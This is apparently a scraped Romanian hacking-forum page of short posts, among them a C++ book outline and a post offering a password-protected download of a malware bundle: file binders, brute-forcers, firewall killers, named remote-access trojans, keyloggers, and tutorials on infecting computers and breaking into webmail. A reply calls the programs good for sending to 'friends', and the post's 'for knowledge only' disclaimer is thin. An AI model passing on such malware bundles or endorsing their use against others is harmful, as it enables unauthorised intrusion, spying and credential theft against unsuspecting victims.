  16. http://www.biosfarm.ro/~dragos/papers/C++-...Book/index.html 1. Scurt istoric 2. Notiunile de baza ale programarii orientate obiect 2.1. Premisele limbajelor orientate obiect 2.2. Concepte fundamentale 3. Clase 3.1. Declararea claselor 3.2. Membrii unei clase 3.3. Crearea si distrugerea obiectelor 3.4. Conceptul de mostenire 4. Programare avansata utilizand clase 4.1. Controlul accesului la clase 4.2. Functii si clase prietene 4.3. Cuvantul cheie this 4.4. Redefinirea operatorilor 4.4.1. Redefinirea operatorului = 4.4.2. Redefinirea operatorului [] 4.4.3. Redefinirea operatorilor new si delete 4.4.4. Redefinirea operatorilor unari 4.5. Mostenirea multipla 4.5.1. Clase virtuale 4.6. Conversii de tip definite de programator 4.6.1. Supraincarcarea operatorului unar "cast" 4.6.2. Conversii de tip folosind constructori 4.7. Constructorul de copiere 4.8. Clase abstracte 4.9. Membri statici ai unei clase 5. Stream-uri 5.1. Introducere 5.2. Obiecte standard 5.3. Redirectari 5.4. cin 5.5. cout 5.5.1. Functii membre ale cout 5.5.2. Formatarea iesirii 5.5.3. Optiuni de formatare a iesirii 5.6. Operatii de intrare/iesire cu fisiere 6. Tratarea exceptiilor 7. Template-uri 8. Programarea in C++ pe sisteme UNIX 9. Introducere in Objective-C 10. Proiectarea si dezvoltarea de aplicatii orientate obiect
  17. All programs are in rar format. Before you run any .exe file, read carefuly any .text suplied with that program or search in "tutorials" section informations "how to use...". All programs are for knowledge only. To understand how a hacker act. Do not fool around with this programs or u may crash your computer or your friends computers. Contains: Binders: -Amok Joiner -Cool Bind 2.2 -EES Binder 1.0 -NT Pacher 2.1 -Bytes Adder -Scramble Tool 0.2 -Daemon Crypt -Fresh Bind -S Binder Brute Force: -FTP Forcer -Brutus -Hacker Utility -HTTP Brute -Shadow Brute -wwwHack -Dictionary IP/Port Scanner: -Port Scanner -Blue IP Scanner -CGI Scanner -NET Bios Scanner -Scanator -Stealth HTTP Scanner -NEO IP Scanner -Net View -NET Scan Tools -Shadow Scanner Firewall Killers: -Secure Spoof -Setup Killer Pro Trojans: -Beast 207 -Blue Eye -Ilusion -Mo s****r -Thief 210 -Nok Nok 7.0 -Net Devil -Pro Rat -Omerta -Y3K Rat 2K5 Key Loggers: -APlus -Curiosity -Elite KeyLogger -Key Copy -Key Spy -Key Logger -S.K.L. Tutorials: -A few words about exploits -Detailed trojan portlist -Few anonimity tips -Few information about viruses -Find serials for programs easy in Google -Hacking with BIOS tutorial -Hacking with TELNET tutorial -How a trojan work in few words -Hoe can i learn programing -How to get an IP adress -How To hack a website or its member section -How to hack a Yahoo Mail or Hotmail -How to infect a computer with a virus or trojan -Intrested to Webdesign ? -Learning Google search engine -Programing a virus in VB6 for beginers -Removing spyware - malware -Small spyware Glossary -The art of Cyber-War -What is a HACKER ? -Beast trojan tutorial -Hacker's Handbook http://rapidshare.de/files/23915946/Comple...s_and_Tools.rar pass : romaniainedit
  18. daca nu ma insel Da_Boss e suspectat cu comunicatzii" suspecte cu nu`s ce "echipa" si poate , e sub supraveghere ! :) ziceam si io ...
  19. TH3_Ly0n u nai gresit niciodata nu ?
  20. si eu ma`m inreg sunt bune ... vreau sa invatz flashu`
  21. http://www.swf.ro/modules.php?op=modload&n...rticles&secid=2
  22. MaHaReT

    Bad Programs

    nice ! am sa le iau , sunt bune de trimis "prietenilor"
  23. Am mai zis !! incerc sa fiu util !!!
  24. MaHaReT

    Telnet

    hmm , am sa incerc !
×
×
  • Create New...